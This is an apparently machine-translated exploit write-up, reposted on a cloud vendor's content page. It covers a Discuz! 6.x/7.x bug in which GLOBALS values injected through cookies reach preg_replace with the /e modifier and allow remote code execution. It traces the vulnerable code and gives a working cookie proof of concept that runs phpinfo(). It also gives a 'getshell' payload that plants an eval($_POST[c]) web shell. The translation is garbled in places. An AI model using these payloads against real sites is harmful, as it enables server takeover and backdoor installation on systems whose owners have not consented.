discuz! 6.x/7.x global Variable Defense bypass causes command execution

Source: Internet
Author: User
Tags phpinfo

Reference: http://wooyun.jozxing.cc/static/bugs/wooyun-2014-080723.html

File located in: include/discuzcode.func.php 第97-241 line function Discuzcode ()

In such a word, $GLOBALS [' _dcache '] [' smilies '] [' Searcharray '], $GLOBALS [' _dcache '] [' smilies '] [' Replacearray ']

$message = preg_replace ($GLOBALS [' _dcache '] [' smilies '] [' Searcharray '], $GLOBALS [' _dcache '] [' smilies '] [' Replacearray '], $message, $maxsmilies);

In 5.3.*, however, the $_request value of this hyper-global variable is affected by Request_order in PHP.ini, and in the latest php5.3.x series, the Request_order default is GP, which means that the default configuration $_ The request contains only $_get and $_post, not $_cookie, so we can submit the Globals variable through a COOKIE. (Default is CGP in 5.3.29)

To demonstrate the vulnerability, set it to GP.

$message = preg_replace ($GLOBALS [' _dcache '] [' smilies '] [' Searcharray '], $GLOBALS [' _dcache '] [' smilies '] [' Replacearray '], $message, $maxsmilies);

A typical vulnerability. Preg_replace () The first two parameters can be controlled, but that is, we just control the first parameter is the/E mode, the second parameter is the PHP code we want to execute, we can form a backdoor.

Here's a point to note that you don't necessarily need the/E mode,

Write a script run to see what characters can be.

<?phppreg_replace ($_get[' a '). * '. $_get[' a ']. ' E ', ' phpinfo (); ', ' a ', 1)?>

  

Specific "" [E-mail protected]#$%^&* ()-+ etc., but pay attention to the transfer process of escaping.

Submit via Cookie: Globals[_dcache][smilies][searcharray]=/.*/eui; Globals[_dcache][smilies][replacearray]=phpinfo ();

Then echo back where the Discuzcode () function is called.

Viewthread_procpost () function 第619-729 line in/viewthread.php

The Discuzcode () function was called on line No. 725

$post [' message '] = Discuzcode ($post [' message '], $post [' Smileyoff '], $post [' Bbcodeoff '], $post [' Htmlon '] & 1, $ forum[' allowsmilies ', $forum [' Allowbbcode '], ($forum [' Allowimgcode '] && $showimages? 1:0), $forum [' Allowhtml '], ($forum [' Jammer '] && $post [' Authorid ']! = $discuz _uid? 1:0), 0, $post [' Authorid '], $forum [' Allowme Diacode '], $post [' pid ']);

  

Call the Viewthread_procpost () function again in the first place

while ($post = $sdb->fetch_array ($query)) {if ($onlyauthoradd && $post [' anonymous '] = = 0) | |! $onlyauthoradd) {$postlist [$post [' pid '] = Viewthread_procpost ($post);}}

Come to/include/discuzcode.func.php when the value of $globals[' _dcache ' [' smilies '] is set, you can execute preg_replace (), resulting in code execution.

if (! $smileyoff && $allowsmilies &&!empty ($GLOBALS [' _dcache '] [' smilies ') && Is_array ($ globals[' _dcache ' [' smilies '])) {...}

  

POC: Added in the cookie: globals[_dcache][smilies][searcharray]=/.*/eui; Globals[_dcache][smilies][replacearray]=phpinfo ();

Then visit either post. /VIEWTHREAD.PHP?TID=13&EXTRA=PAGE%3D1 can trigger a vulnerability.

Getsshell:globals[_dcache][smilies][searcharray]=/.*/eui; Globals[_dcache][smilies][replacearray]=eval ($_post[c])%3b;

discuz! 6.x/7.x global Variable Defense bypass causes command execution

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.